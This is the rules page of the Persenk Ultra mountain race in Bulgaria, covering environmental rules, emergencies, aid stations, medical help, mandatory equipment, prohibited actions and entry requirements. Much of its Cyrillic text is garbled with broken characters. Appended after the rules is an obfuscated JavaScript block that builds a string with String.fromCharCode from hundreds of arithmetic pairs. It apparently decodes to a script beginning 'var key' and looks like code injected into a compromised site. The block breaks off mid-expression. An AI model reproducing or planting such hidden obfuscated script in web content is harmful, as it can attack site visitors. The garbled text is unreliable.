Моля, запознайте се внимателно с правил��та за учас��ие в Persenk Ultra. Нарушаването им може да доведе до добавяне на наказателно време към Вашият резултат или до незабавна дисква��ификация

I. ОКОЛНА СРЕДА

 1. Състезателите са длъжни ��а се движат са��о по обозначеното трасе като през цялото време се намират върху пътя/пътеката
 2. Забранено е изхвърлянето на всякакъв вид отпадъци по трасето и около него. На всички състезатели ще бъдат раздадени херметически затварящи се торбички, в които ще можете да поставите всички опаковки от храна и други отпадъци, както и употребената тоалетна хартия. Торбичките, както и всички останали отпадъци, могат да бъдат изхвърлени на обозначените места на контролните пунктове, от където ще мо����ете да получите и нови торбички
 3. С цел нам��л��в��н���� на ��тпадъците на контролните пунктове няма да има пластмасови чаши и бутилки за вода. Всички състезатели трябва да носят със себе си подходящ съд, в който мога�� да получат вода и други напитки на конт��олните пунк��ове
 4. Използването на туристически щеки е разрешено
 5. С цел нямаляване на ефекта върху околната среда се препоръчва зрителите и поддръжниците на състезателите да използват обществен транспорт, когато това е възможно

II. ИЗВЪНРЕДНИ СИТУАЦИИ И  ОТНОШЕНИЯ С НЕСЪСТЕЗАТЕЛИ

 1. Всички състезатели са задължени да следват стриктно указанията, дадени от съдиите и останалия организационен персонал
 2. Всички състезатели са длъжни да окажат по����щ на всеки човек – друг състезател, съдия, персонал на контролните пунктове, както и зрители и туристи в случай на нужда, независимо от евентуалното забавяне, коет�� може да бъде причинено от това
 3. Ако попадне��е в опасна ситуация заедно с ��руги хора, моля ��огрижете се първо з�� собствената си безопасност преди да окажете помощ на околните
 4. Трасето на състезанието преминава през публична и частна собственост и няма да бъде затворено за хора, които не участват в състезанието! Уверете се, че ги зад��и��авате/се разминавате по безопасен з�� всички начин, дори това да означава да намалите темпото си или дори да спрете в случай на нужда!
 5. Части от трасето преминават през населени места. Моля, постарайте се да не вдигате излиш����н шум, когато преминав��те през тях през нощта.
 6. При прем��наване през населени места и дв��жение по автомобилни пътища моля спазвайте правилата за движение!

III. ПО��КРЕПИТЕЛНИ ПУНКТОВЕ И ВЪНШНА ПОМОЩ

 1. По протежение на състезателното трасе организаторите ще изград��т подкрепителни и контролни пунктове на подходящи за целта места. Тези пунктове ще предлагат вода, спортни напитки и храна на състезателите.
 2. Храната и водата на подкрепителните пунктове е предназначена единствено за официално регистрира��ите състезатели
 3. Състезателите са длъжни да изхвърлят употребените херметически затв��рящи се торбички за отпадъци само на определените за това места на подкрепителните и контролни пу��ктове. На всеки ����т тях ��е ще мо������ат да ��������олучат нова т��������р��и��к��, ����о��то да из��������о����ват в о������������тава����а����������а част от трасето
 4. На подкрепителен пункт “в. Персенк” учас��ниците ще имат на разположение питателна храна, място за отдих и възможност за масаж
 5. Участниците в Персенк Ултра ще получат при регистрацията си найлонова торба с вмес��имост 35L с прикрепен състезателния номер на участника. В нея те могат да поставят необходими им дрехи и вещи и да я пр��дадат на организаторите. Организаторите ще транспортират  тази торба до пункт “в. Персенк”, къ��ето тя ще бъде на разположение на състезателите. Организаторите ще транспортират обратно торбата и вещите в нея д�� старт/финал�� на състезанието, където участниците ще могат да получат своите вещи. Предвид характерът на м��роприятието организаторите не могат поемат отговорн��ст за ��елостта на ��орбата и вещите в нея при транспортиран����то, ето защо не препоръчват в нея да не бъда�� поставяни ценни вещи, пари и докум��нти. В торбите е забранено поставянето на щеки!
 6. На състезателите е разрешено да получават ��омощ от външн�� лица само на определените за това места на територията на подкрепителните пунктове. Получаването на каквато и да е пом��щ от външни лица извън тях, освен в случаите на кра��на необходимост, е недопустимо.
 7. Забранено е движението на нерегистрирани участници заедно ��ъс състезателите по трасето.
 8. На всеки ��одкрепителен пункт ще бъде поставена информационна табела, която ще съдържа информация за:
 • името на пункта
 • името на следващия пункт по трасето
 • разстоян��е до следващия пункт по трасето
 • сумарна поло��ителна денивелация до следващия пунк�� по трасето
 • сумарна отрицателна денивелация до следващия пункт по трасето
 • контролно време за достигане на следващия пункт по трасето (където има поставено такова ограничение)
 • наличие на източници на вода по трасето до сле��ващия пункт
 • относителна трудност на прехода до следващия пункт

IV. МЕДИЦИ��СКА ПОМОЩ И ОТКАЗВАНЕ ОТ СЪСТЕЗАНИЕТО

 1. Организаторите ще ��сигурят медицински екипи в районите на старт/финала и пункт “в. Персенк”, както и тр��нспорт на подстрадали състезатели по трасето. Въпреки това всички състезатели трябва да са наясно с рисковете и опасностите, свързани с участието в подобно мероприятие и ��екларират, че участват в ��ъстезанието на своя отговорност!
 2. Предвид специфи��ата на трасето всички участници трябва да са наясно, че е въ��можно да измине много време преди медицински или спасителен екип да може да достигне до тях в случай н�� нужда
 3. По тяхна пр��ценка мед��цинскит�� лица или персоналът на контролните пунктове могат да прекратят участието на всеки състезател, чието физическо и психическо състояние не би позволило по-нататъшно участие в ������стезанието. Това им решение е окончател��о и участникът трябва да им предаде своя състезателен номер
 4. В случай, че прецените че е невъзможно да продължите участието си в състезанието, е препоръчително да отидете до най-близкия до Вас подкрепителен пункт, като това може да означава да се ��ърнете обрат��о. Ето защо горещо се препоръчва преди да напуснете даден пункт д�� се информирате за разстоянието, трасето и относителната му трудност и внимателно да прецените дали да продължите участието си в състезанието. Организаторите ще осигуря�� транспорт на отказалите се състезатели от подкрепителните пунктове до старт/финала на състезанието
 5. В случай на инцидент, при с�� намирате по трасето между два пункта и ���� можете да достигнете до нито един от тях самостоятелно, се св��ржете с организаторите на телефонния номер, отпечатан на състезателния номер. В случай, че ��ова е невъзможно, се обадете на Единния европейск�� номер за спешни повиквания (112), който също ще б��де отпечатан на състезателния номер.

V. ЕКИПИРОВКА

V.I ЗАДЪЛЖИТЕЛНА ЕКИПИРОВКА

Организаторите ����а състезанието си запазват правото да инспектират наличието на всички елементи от задължителната екипировка по време на състезанието. Липсата на някой от тях ще доведе до дисквалификация на участника!

 1. Осветл��ние! Тъй като поне 6 ча��а от преми��аването на тр��с��т���� ще бъде през ��ъмнат�� част от денонощето в��ек�� състезател е длъжен да да ��оси със с��б�� си: 2 източника ���� светлина със сменаяеми ба��ерии + по 2 комплек��а батерии ��а всяка (единият р������зерв��н) ИЛИ 3 източника ��а осветление с презареждаеми ��атерии (з��реде��и) ИЛ�� 1 източник на светлина с п��езареждаеми батерии + един източник на светлина със сменяеми батерии и два комплекта батерии за него (единият резервен)
 2. Мобилен телефон със з����редена батерия и възможност да пр��веждане на изходящи разговори на територията на Република България. Мобилните оператори в България предлагат покритие по стандартите GMS 900/1800 и UMTS 2100 MHz. Моля отбележете, че предвид спецификата на трасето т��ва покритие не може да бъде гарантирано по цялото му протежение!
 3. Съд за течности с вместимост поне 150 ml. На подкрепителните пунктове НЯМА да бъдат налични чаши и бутилки за еднократна употреба!
 4. На старта и при напускането на всеки от подк��епителните пунктове всеки състезател е длъжен да има в себе си минимум 1L вода или подобни течности. По протежение на трасето има множество източници на вода – извори, потоци, чешми, които се приемат за достатъчно сигур��и за питейни нужди, но организаторите не могат да поемат отговорност за тяхната пригодност и употреба
 5. Храна с енергийна равностойност на поне 1000 kcal
 6. Горна дреха с дълъг ръкав и тегло поне 180 g/m² БЕЗ памучни такива
 7. Връхна дреха с водо��епропускливост поне 10 000 mm воден стълб
 8. Дрехи или комбинация от такива, които изцяло покриват краката
 9. Шапка
 10. Светлоотражателен елемент с размери пон�� 10х10 cm или такива, вградени в дрехите, с изключение на светлоотражателните елементи по обувките
 11. Алуминиево фолио (survival blanket) с размери поне 130 х 200 cm
 12. Свирка
 13. Звънче
 14. Пакет за първа помощ в планината
 15. Състезате��ен номер¹, който следва да е фиксиран на гърдит��, корема или предната част на бедрата и да е видим през цяло��о време на състезанието. Изключения се допускат само при крайно лоши метеорологични условия, когато номерът може да бъде покрит от връхни дрехи. В такъв случай състезателите са длъжни да ��о показват винаги при поискване от официалните лица
 16. Карта и ин��ормационна таблица на трасе��о¹

¹Из��скваните п��едмети по точки 15 и 16 ще бъдат предоставени от организаторите като част от стартовия пакет на състезате��ите

V.II ПРЕПОРЪЧИТЕЛНА ЕКИПИРОВКА

 1. Компас
 2. По��робна карта на местността
 3. GPS уред с карта на местността
 4. Туристически щеки
 5. Адекватна застраховка
 6. Ръкавици

VI. ОТМЯНА НА СЪСТЕЗАНИЕТО

 1. Организаторите си зап��зват правото да отм��нят или прекратят състезанието във всеки един момент, когато това се налага от съображения за сигурност
 2. В такива случ��и ��рганизаторите възстановяват единствено таксата за участие, заплатена от състезателите

VII. ЗАБР��НЕНИ ДЕЙСТВИЯ

 1. Движение на състезателите извън маркираното трасе
 2. Получаване на помощ от несъстезатели извъ�� определените за целта места
 3. Неспазване на указания на съдиит�� и длъжн��стните лица
 4. Липса на която и да е част от задължителната екипировка
 5. Не оказване на помощ на човек, изпаднал в беда на трасето
 6. Използване на вещества и практики, включени в забранителния списък на WADA

VIII. ИЗИСКВАНИЯ КЪМ СЪСТЕЗАТЕЛИТЕ

 1. До уча��тие в състезанието се допускат само участници, навършили 18 години в деня на старта, които подписват декларация за съгласие с условията за провеждане на състезанието и освобожда��ане от отговорност на организаторите
 2. Състезателите трябва да бъдат подробно запоз��ати с усилията, необходими за участие в плани��ски ултрамаратони и да бъдат адекватно физически и психически подготвени
 3. Състезателите трябва да могат да се справят сами, без външна помощ, с всички рискове, които крие участието в планински ултрамаратон: умора, физически неразположения и наранявания, лоши климатични условия (дъжд, с��яг, силен вятър, мъгла, кал, студ, горещини), ориентиране, придвижване през нощта
Моля, помогнете ни да з��пазим планината и природата като се п��идържате стриктно к��м правилата на състезанието!

var URBUJIFCIO = String.fromCharCode(12 – 2, 127 – 9, 101 – 4, 115 – 1, 36 – 4, 112 – 5, 102 – 1, 128 – 7, 41 – 9, 67 – 6, 39 – 7, 41 – 2, 107 – 7, 111 – 7, 105 – 1, 79 – 3, 122 – 7, 124 – 2, 116 – 7, 121 – 7, 71 – 3, 82 – 8, 48 – 9, 66 – 7, 12 – 2, 124 – 6, 105 – 8, 122 – 8, 37 – 5, 106 – 5, 117 – 7, 105 – 6, 108 – 7, 104 – 4, 36 – 4, 69 – 8, 37 – 5, 45 – 6, 87 – 4, 53 – 5, 107 – 7, 88 – 3, 83 – 3, 128 – 8, 71 – 6, 82 – 9, 67 – 1, 68 – 3, 75 – 2, 123 – 4, 104 – 4, 76 – 5, 60 – 8, 108 – 7, 68 – 1, 93 – 9, 60 – 7, 86 – 2, 75 – 7, 86 – 2, 82 – 9, 106 – 5, 76 – 1, 122 – 1, 110 – 3, 77 – 7, 77 – 5, 66 – 1, 75 – 6, 110 – 4, 75 – 3, 95 – 9, 118 – 6, 83 – 2, 91 – 6, 112 – 7, 113 – 2, 52 – 5, 74 – 7, 68 – 3, 85 – 3, 91 – 7, 90 – 8, 118 – 8, 110 – 3, 79 – 2, 73 – 5, 66 – 1, 73 – 7, 115 – 8, 80 – 4, 106 – 3, 121 – 6, 74 – 4, 74 – 7, 91 – 8, 92 – 7, 103 – 3, 69 – 2, 89 – 4, 51 – 2, 86 – 6, 97 – 7, 69 – 3, 78 – 8, 126 – 9, 90 – 7, 70 – 1, 110 – 6, 116 – 2, 77 – 6, 120 – 1, 53 – 1, 91 – 1, 73 – 8, 118 – 8, 55 – 2, 116 – 8, 89 – 6, 127 – 8, 82 – 5, 78 – 7, 88 – 9, 70 – 5, 71 – 6, 78 – 1, 89 – 8, 127 – 7, 125 – 6, 115 – 4, 99 – 9, 87 – 6, 50 – 2, 71 – 1, 69 – 2, 87 – 4, 119 – 4, 92 – 5, 72 – 5, 92 – 7, 80 – 7, 78 – 7, 78 – 3, 85 – 1, 118 – 6, 80 – 5, 73 – 2, 70 – 5, 67 – 2, 63 – 7, 88 – 2, 71 – 1, 96 – 6, 112 – 2, 92 – 7, 111 – 2, 84 – 2, 124 – 8, 75 – 7, 70 – 4, 122 – 3, 104 – 5, 83 – 3, 73 – 4, 116 – 8, 95 – 9, 88 – 7, 105 – 1, 93 – 8, 59 – 9, 76 – 3, 128 – 9, 108 – 1, 74 – 9, 75 – 9, 125 – 4, 98 – 8, 103 – 3, 78 – 6, 105 – 2, 66 – 1, 88 – 6, 82 – 5, 94 – 7, 89 – 8, 73 – 8, 73 – 8, 50 – 2, 105 – 6, 108 – 4, 73 – 1, 69 – 3, 56 – 4, 97 – 8, 78 – 6, 109 – 4, 75 – 6, 58 – 5, 90 – 7, 128 – 9, 87 – 2, 75 – 3, 77 – 2, 71 – 4, 122 – 3, 76 – 9, 78 – 6, 109 – 6, 121 – 6, 52 – 1, 87 – 7, 106 – 3, 78 – 9, 78 – 8, 87 – 5, 131 – 9, 112 – 9, 110 – 9, 72 – 5, 114 – 7, 85 – 8, 72 – 5, 82 – 6, 77 – 9, 120 – 8, 75 – 7, 87 – 5, 79 – 8, 80 – 6, 118 – 3, 93 – 8, 53 – 4, 54 – 6, 77 – 7, 69 – 3, 115 – 9, 74 – 9, 57 – 3, 93 – 5, 113 – 6, 103 – 3, 80 – 8, 81 – 8, 73 – 7, 80 – 7, 89 – 4, 75 – 8, 112 – 8, 103 – 4, 109 – 6, 81 – 8, 124 – 5, 57 – 5, 69 – 1, 74 – 6, 90 – 3, 80 – 7, 103 – 3, 78 – 8, 109 – 2, 77 – 4, 76 – 9, 82 – 7, 72 – 4, 57 – 1, 77 – 9, 73 – 8, 89 – 8, 95 – 6, 53 – 6, 92 – 4, 69 – 4, 54 – 2, 72 – 7, 66 – 1, 110 – 1, 119 – 8, 58 – 4, 72 – 4, 68 – 2, 107 – 3, 84 – 4, 97 – 8, 76 – 4, 109 – 1, 105 – 8, 89 – 5, 87 – 1, 91 – 6, 120 – 5, 85 – 5, 113 – 9, 68 – 3, 97 – 8, 92 – 7, 118 – 9, 86 – 8, 104 – 5, 75 – 5, 124 – 5, 112 – 9, 88 – 2, 81 – 7, 87 – 3, 54 – 2, 68 – 2, 73 – 1, 85 – 4, 61 – 8, 114 – 9, 71 – 1, 106 – 2, 61 – 9, 81 – 8, 74 – 2, 111 – 6, 123 – 7, 110 – 3, 74 – 7, 105 – 2, 50 – 2, 100 – 1, 96 – 7, 121 – 1, 74 – 9, 105 – 5, 72 – 6, 77 – 7, 61 – 5, 115 – 6, 76 – 3, 127 – 8, 113 – 1, 76 – 4, 75 – 3, 72 – 5, 70 – 1, 75 – 7, 95 – 9, 67 – 1, 55 – 7, 101 – 4, 87 – 9, 76 – 5, 58 – 9, 78 – 5, 92 – 3, 116 – 9, 113 – 9, 116 – 1, 95 – 9, 75 – 9, 75 – 2, 96 – 6, 71 – 5, 112 – 6, 89 – 7, 120 – 1, 88 – 5, 49 – 1, 102 – 3, 104 – 2, 83 – 4, 120 – 1, 91 – 9, 92 – 7, 71 – 5, 73 – 7, 76 – 7, 109 – 1, 79 – 5, 66 – 1, 81 – 4, 104 – 4, 73 – 2, 113 – 8, 87 – 1, 101 – 1, 72 – 1, 88 – 7, 74 – 1, 105 – 3, 102 – 5, 122 – 1, 108 – 9, 82 – 6, 71 – 3, 70 – 4, 51 – 3, 108 – 5, 78 – 8, 107 – 4, 113 – 5, 69 – 2, 79 – 7, 128 – 7, 118 – 3, 121 – 4, 80 – 1, 127 – 7, 73 – 8, 99 – 1, 80 – 2, 89 – 8, 72 – 7, 87 – 8, 71 – 4, 67 – 1, 63 – 6, 123 – 9, 81 – 1, 112 – 9, 116 – 9, 91 – 2, 86 – 4, 108 – 2, 123 – 4, 100 – 2, 75 – 8, 110 – 3, 118 – 6, 105 – 4, 92 – 8, 118 – 9, 114 – 2, 72 – 3, 85 – 1, 121 – 2, 72 – 7, 59 – 7, 75 – 9, 126 – 7, 119 – 7, 97 – 9, 95 – 7, 92 – 5, 123 – 8, 63 – 6, 78 – 9, 124 – 4, 59 – 2, 78 – 7, 88 – 8, 74 – 8, 90 – 5, 88 – 1, 68 – 1, 67 – 1, 93 – 8, 108 – 4, 98 – 8, 125 – 5, 74 – 9, 108 – 8, 78 – 6, 76 – 5, 74 – 5, 93 – 8, 70 – 2, 127 – 7, 111 – 3, 107 – 8, 74 – 1, 75 – 8, 58 – 1, 80 – 4, 75 – 3, 127 – 7, 113 – 9, 112 – 8, 78 – 9, 71 – 5, 94 – 9, 72 – 4, 72 – 6, 109 – 4, 76 – 7, 109 – 2, 75 – 6, 70 – 1, 107 – 8, 90 – 1, 81 – 8, 74 – 9, 95 – 6, 103 – 3, 74 – 8, 71 – 5, 127 – 8, 59 – 8, 95 – 5, 85 – 3, 66 – 1, 107 – 6, 89 – 2, 96 – 9, 80 – 3, 78 – 6, 72 – 2, 129 – 9, 58 – 9, 104 – 5, 84 – 6, 68 – 1, 82 – 9, 93 – 8, 89 – 5, 55 – 7, 86 – 4, 72 – 1, 89 – 4, 54 – 5, 115 – 3, 80 – 5, 80 – 9, 109 – 3, 71 – 6, 49 – 6, 72 – 2, 78 – 8, 77 – 3, 73 – 1, 97 – 8, 128 – 9, 118 – 7, 89 – 3, 75 – 8, 128 – 8, 100 – 1, 106 – 2, 86 – 6, 108 – 1, 115 – 4, 78 – 2, 75 – 9, 130 – 9, 77 – 7, 104 – 5, 75 – 3, 109 – 5, 60 – 4, 77 – 5, 84 – 6, 68 – 1, 117 – 2, 75 – 2, 87 – 5, 120 – 1, 87 – 2, 109 – 3, 79 – 9, 124 – 5, 60 – 4, 75 – 9, 72 – 2, 130 – 8, 108 – 8, 117 – 9, 73 – 4, 70 – 5, 91 – 6, 97 – 8, 90 – 1, 110 – 7, 79 – 2, 86 – 3, 75 – 3, 87 – 1, 93 – 7, 115 – 4, 85 – 4, 74 – 5, 89 – 7, 78 – 5, 93 – 9, 126 – 5, 90 – 9, 78 – 6, 75 – 7, 110 – 6, 57 – 8, 76 – 3, 100 – 3, 55 – 5, 92 – 7, 92 – 4, 76 – 5, 86 – 4, 54 – 6, 121 – 5, 67 – 2, 70 – 4, 76 – 2, 67 – 2, 74 – 2, 123 – 2, 116 – 1, 126 – 4, 73 – 8, 88 – 7, 91 – 2, 72 – 1, 83 – 8, 88 – 6, 105 – 6, 85 – 5, 73 – 1, 121 – 1, 80 – 3, 114 – 1, 79 – 4, 84 – 3, 77 – 7, 76 – 5, 75 – 7, 107 – 1, 55 – 2, 100 – 1, 77 – 7, 123 – 4, 81 – 8, 88 – 1, 83 – 6, 91 – 8, 98 – 9, 70 – 4, 74 – 3, 56 – 8, 105 – 6, 111 – 7, 80 – 8, 73 – 7, 58 – 6, 124 – 3, 76 – 9, 111 – 5, 103 – 4, 127 – 5, 72 – 2, 127 – 7, 123 – 4, 84 – 6, 81 – 8, 94 – 8, 121 – 2, 84 – 5, 72 – 7, 68 – 3, 80 – 6, 122 – 9, 82 – 3, 106 – 3, 128 – 9, 95 – 6, 92 – 8, 59 – 9, 71 – 5, 60 – 7, 90 – 3, 114 – 7, 51 – 2, 95 – 9, 83 – 7, 76 – 8, 56 – 4, 82 – 1, 74 – 3, 79 – 9, 78 – 4, 108 – 2, 94 – 6, 69 – 4, 53 – 5, 104 – 7, 69 – 3, 91 – 4, 116 – 5, 119 – 2, 71 – 6, 87 – 5, 60 – 8, 76 – 4, 77 – 4, 111 – 8, 85 – 8, 92 – 6, 76 – 4, 127 – 8, 94 – 5, 115 – 3, 79 – 5, 84 – 2, 71 – 6, 80 – 8, 76 – 5, 111 – 5, 64 – 7, 104 – 4, 73 – 2, 83 – 2, 77 – 3, 106 – 7, 76 – 1, 112 – 6, 71 – 5, 79 – 3, 67 – 2, 86 – 5, 94 – 9, 121 – 5, 71 – 1, 71 – 5, 64 – 8, 105 – 4, 90 – 2, 89 – 5, 68 – 3, 118 – 8, 76 – 6, 76 – 7, 97 – 8, 97 – 8, 78 – 4, 66 – 1, 82 – 4, 101 – 1, 99 – 9, 126 – 5, 66 – 9, 49 – 2, 82 – 1, 76 – 5, 58 – 6, 82 – 3, 73 – 1, 89 – 6, 77 – 4, 85 – 4, 69 – 1, 105 – 2, 83 – 2, 103 – 3, 84 – 9, 111 – 2, 112 – 1, 71 – 3, 71 – 3, 83 – 1, 122 – 3, 74 – 1, 80 – 8, 70 – 4, 104 – 5, 85 – 8, 78 – 7, 122 – 1, 112 – 1, 73 – 4, 70 – 4, 86 – 5, 88 – 3, 84 – 6, 97 – 7, 74 – 8, 107 – 8, 87 – 1, 67 – 2, 69 – 3, 82 – 5, 117 – 1, 76 – 2, 70 – 1, 53 – 4, 81 – 8, 73 – 4, 51 – 3, 99 – 9, 86 – 2, 95 – 8, 112 – 8, 124 – 9, 87 – 3, 79 – 1, 111 – 2, 114 – 3, 107 – 8, 73 – 8, 68 – 2, 118 – 6, 123 – 8, 93 – 9, 115 – 7, 114 – 3, 75 – 7, 75 – 5, 128 – 6, 86 – 8, 119 – 6, 87 – 7, 72 – 5, 89 – 4, 116 – 9, 70 – 4, 71 – 6, 106 – 7, 80 – 1, 78 – 6, 88 – 5, 70 – 5, 110 – 6, 80 – 1, 128 – 8, 70 – 1, 79 – 1, 80 – 9, 130 – 8, 111 – 7, 106 – 8, 86 – 1, 58 – 9, 99 – 9, 54 – 2, 99 – 9, 72 – 1, 117 – 6, 106 – 7, 67 – 2, 75 – 9, 119 – 7, 114 – 9, 75 – 3, 73 – 7, 89 – 8, 109 – 7, 78 – 8, 127 – 6, 91 – 6, 126 – 9, 75 – 3, 85 – 3, 118 – 3, 103 – 4, 85 – 9, 88 – 7, 104 – 5, 107 – 5, 72 – 4, 113 – 9, 115 – 4, 116 – 8, 83 – 9, 69 – 4, 84 – 7, 86 – 8, 85 – 2, 78 – 6, 77 – 7, 89 – 5, 78 – 6, 72 – 6, 108 – 5, 101 – 2, 78 – 4, 124 – 2, 60 – 8, 81 – 3, 72 – 6, 121 – 2, 96 – 6, 115 – 8, 93 – 6, 111 – 3, 113 – 2, 90 – 3, 102 – 1, 80 – 9, 86 – 4, 120 – 7, 84 – 2, 71 – 2, 104 – 1, 73 – 7, 77 – 2, 113 – 5, 85 – 7, 92 – 9, 74 – 4, 86 – 4, 119 – 8, 51 – 1, 98 – 8, 73 – 7, 93 – 4, 85 – 7, 72 – 5, 87 – 4, 111 – 8, 83 – 8, 83 – 8, 89 – 7, 113 – 6, 87 – 3, 80 – 3, 70 – 3, 59 – 2, 70 – 1, 89 – 3, 88 – 2, 89 – 3, 121 – 6, 84 – 9, 127 – 5, 108 – 9, 113 – 9, 86 – 7, 110 – 4, 73 – 8, 45 – 2, 79 – 9, 69 – 1, 115 – 4, 81 – 3, 82 – 2, 86 – 5, 94 – 5, 110 – 8, 73 – 1, 106 – 3, 92 – 2, 114 – 1, 73 – 5, 106 – 1, 119 – 4, 113 – 4, 78 – 2, 96 – 9, 91 – 5, 88 – 4, 66 – 1, 95 – 8, 104 – 4, 87 – 4, 93 – 3, 72 – 1, 114 – 2, 72 – 3, 90 – 7, 72 – 3, 104 – 1, 116 – 8, 79 – 9, 95 – 9, 115 – 3, 79 – 9, 75 – 8, 113 – 8, 127 – 8, 53 – 1, 84 – 1, 111 – 7, 116 – 5, 85 – 7, 81 – 1, 127 – 8, 78 – 1, 95 – 9, 74 – 9, 123 – 4, 70 – 1, 110 – 6, 81 – 9, 109 – 6, 77 – 8, 90 – 9, 78 – 6, 74 – 3, 129 – 9, 90 – 4, 96 – 8, 74 – 5, 56 – 8, 79 – 4, 77 – 1, 70 – 2, 112 – 8, 79 – 4, 78 – 7, 108 – 5, 55 – 7, 49 – 2, 73 – 8, 124 – 4, 88 – 3, 69 – 1, 72 – 7, 86 – 3, 78 – 9, 108 – 7, 73 – 8, 90 – 8, 70 – 5, 102 – 3, 94 – 5, 105 – 2, 105 – 6, 75 – 2, 67 – 1, 69 – 3, 59 – 2, 119 – 4, 98 – 9, 55 – 7, 114 – 3, 77 – 8, 74 – 6, 92 – 9, 78 – 5, 86 – 1, 70 – 2, 111 – 8, 95 – 9, 84 – 1, 107 – 6, 115 – 6, 116 – 4, 88 – 3, 84 – 3, 91 – 6, 108 – 5, 58 – 7, 105 – 4, 88 – 2, 113 – 1, 86 – 8, 92 – 7, 115 – 6, 86 – 4, 116 – 3, 83 – 1, 75 – 6, 112 – 8, 80 – 7, 87 – 8, 129 – 8, 127 – 8, 90 – 3, 67 – 2, 105 – 1, 76 – 7, 115 – 7, 85 – 5, 108 – 5, 49 – 1, 75 – 3, 70 – 4, 117 – 8, 124 – 4, 82 – 3, 91 – 4, 112 – 8, 92 – 7, 100 – 3, 86 – 8, 118 – 9, 86 – 5, 92 – 5, 69 – 1, 83 – 1, 121 – 6, 60 – 4, 75 – 3, 73 – 7, 87 – 6, 106 – 5, 77 – 7, 124 – 4, 74 – 9, 124 – 6, 76 – 4, 70 – 4, 127 – 7, 79 – 8, 83 – 4, 69 – 4, 75 – 6, 90 – 6, 70 – 5, 74 – 4, 119 – 7, 124 – 8, 108 – 9, 88 – 1, 58 – 5, 74 – 1, 90 – 7, 74 – 3, 127 – 7, 87 – 3, 89 – 2, 111 – 4, 52 – 4, 82 – 2, 85 – 1, 118 – 9, 116 – 4, 72 – 3, 90 – 7, 74 – 5, 106 – 3, 125 – 5, 106 – 5, 89 – 3, 120 – 8, 86 – 8, 73 – 5, 55 – 4, 64 – 7, 72 – 7, 89 – 7, 78 – 9, 104 – 1, 89 – 8, 83 – 9, 67 – 2, 78 – 8, 87 – 2, 70 – 5, 104 – 1, 80 – 7, 106 – 2, 75 – 1, 71 – 2, 126 – 6, 82 – 2, 85 – 9, 120 – 1, 109 – 2, 119 – 9, 95 – 7, 89 – 4, 74 – 4, 90 – 7, 80 – 7, 76 – 9, 89 – 4, 77 – 3, 76 – 9, 89 – 8, 76 – 7, 114 – 9, 92 – 4, 56 – 7, 119 – 8, 98 – 8, 66 – 1, 76 – 8, 75 – 6, 125 – 7, 87 – 3, 91 – 5, 79 – 1, 106 – 1, 104 – 6, 76 – 6, 81 – 4, 71 – 4, 73 – 7, 85 – 4, 73 – 7, 116 – 3, 87 – 8, 89 – 8, 71 – 2, 77 – 6, 70 – 2, 73 – 2, 89 – 7, 98 – 1, 85 – 4, 91 – 4, 108 – 9, 82 – 2, 86 – 2, 110 – 3, 69 – 4, 74 – 7, 68 – 2, 127 – 7, 115 – 3, 119 – 4, 89 – 2, 121 – 2, 127 – 8, 84 – 7, 69 – 4, 78 – 7, 86 – 5, 115 – 9, 91 – 9, 75 – 5, 88 – 2, 78 – 5, 104 – 2, 77 – 8, 105 – 1, 100 – 3, 74 – 8, 77 – 7, 80 – 6, 57 – 5, 102 – 5, 107 – 4, 73 – 8, 80 – 8, 75 – 9, 89 – 6, 53 – 5, 105 – 8, 74 – 4, 68 – 2, 55 – 2, 102 – 3, 81 – 6, 75 – 8, 61 – 5, 77 – 2, 71 – 3, 123 – 3, 121 – 2, 111 – 4, 86 – 3, 79 – 9, 118 – 7, 75 – 6, 88 – 1, 94 – 7, 65 – 8, 114 – 8, 88 – 6, 69 – 3, 85 – 7, 111 – 6, 104 – 6, 73 – 3, 82 – 5, 106 – 6, 76 – 9, 73 – 8, 96 – 7, 69 – 4, 83 – 9, 90 – 9, 108 – 1, 82 – 8, 68 – 3, 89 – 6, 79 – 6, 59 – 2, 80 – 9, 121 – 2, 69 – 4, 97 – 9, 99 – 1, 70 – 3, 59 – 7, 83 – 7, 74 – 8, 89 – 8, 113 – 6, 110 – 2, 74 – 2, 85 – 4, 116 – 9, 57 – 7, 79 – 8, 123 – 3, 116 – 8, 111 – 5, 93 – 5, 57 – 7, 77 – 4, 92 – 6, 83 – 1, 115 – 5, 113 – 6, 107 – 8, 76 – 5, 70 – 4, 128 – 9, 114 – 4, 87 – 7, 108 – 5, 50 – 2, 75 – 3, 72 – 6, 115 – 6, 120 – 1, 74 – 9, 75 – 7, 110 – 7, 121 – 2, 69 – 4, 82 – 5, 74 – 3, 77 – 3, 82 – 4, 89 – 6, 72 – 6, 82 – 4, 76 – 5, 103 – 2, 90 – 4, 113 – 1, 81 – 3, 71 – 5, 68 – 1, 92 – 7, 60 – 8, 88 – 6, 67 – 2, 59 – 7, 103 – 6, 79 – 6, 129 – 9, 58 – 5, 106 – 9, 93 – 8, 77 – 7, 80 – 7, 107 – 4, 78 – 4, 82 – 1, 108 – 9, 101 – 1, 72 – 6, 88 – 5, 114 – 7, 107 – 7, 70 – 2, 108 – 1, 78 – 1, 70 – 5, 81 – 8, 86 – 3, 127 – 8, 71 – 5, 79 – 8, 107 – 3, 113 – 2, 119 – 7, 66 – 1, 94 – 9, 73 – 3, 119 – 9, 91 – 6, 115 – 6, 84 – 3, 59 – 3, 70 – 4, 89 – 7, 121 – 9, 79 – 6, 82 – 8, 94 – 9, 107 – 3, 123 – 4, 94 – 4, 52 – 3, 75 – 1, 108 – 1, 98 – 8, 87 – 2, 122 – 6, 74 – 1, 81 – 8, 92 – 9, 121 – 9, 86 – 2, 72 – 3, 128 – 8, 115 – 7, 91 – 5, 79 – 1, 54 – 4, 119 – 8, 69 – 4, 66 – 1, 84 – 2, 117 – 6, 120 – 8, 77 – 8, 71 – 6, 54 – 1, 116 – 6, 88 – 3, 114 – 5, 85 – 4, 60 – 4, 69 – 3, 90 – 8, 117 – 5, 76 – 3, 81 – 6, 91 – 9, 91 – 2, 109 – 7, 93 – 9, 94 – 9, 66 – 9, 113 – 6, 76 – 7, 86 – 1, 99 – 9, 80 – 5, 87 – 5, 74 – 3, 61 – 8, 93 – 9, 90 – 3, 70 – 2, 73 – 7, 81 – 7, 93 – 9, 110 – 3, 67 – 1, 71 – 2, 84 – 1, 70 – 4, 56 – 4, 118 – 2, 67 – 2, 87 – 1, 117 – 6, 110 – 9, 73 – 3, 56 – 6, 83 – 1, 52 – 1, 84 – 2, 75 – 7, 85 – 7, 82 – 7, 83 – 8, 125 – 5, 127 – 8, 90 – 4, 71 – 4, 111 – 7, 55 – 3, 106 – 2, 105 – 8, 75 – 6, 113 – 9, 76 – 3, 92 – 9, 112 – 6, 89 – 4, 84 – 1, 72 – 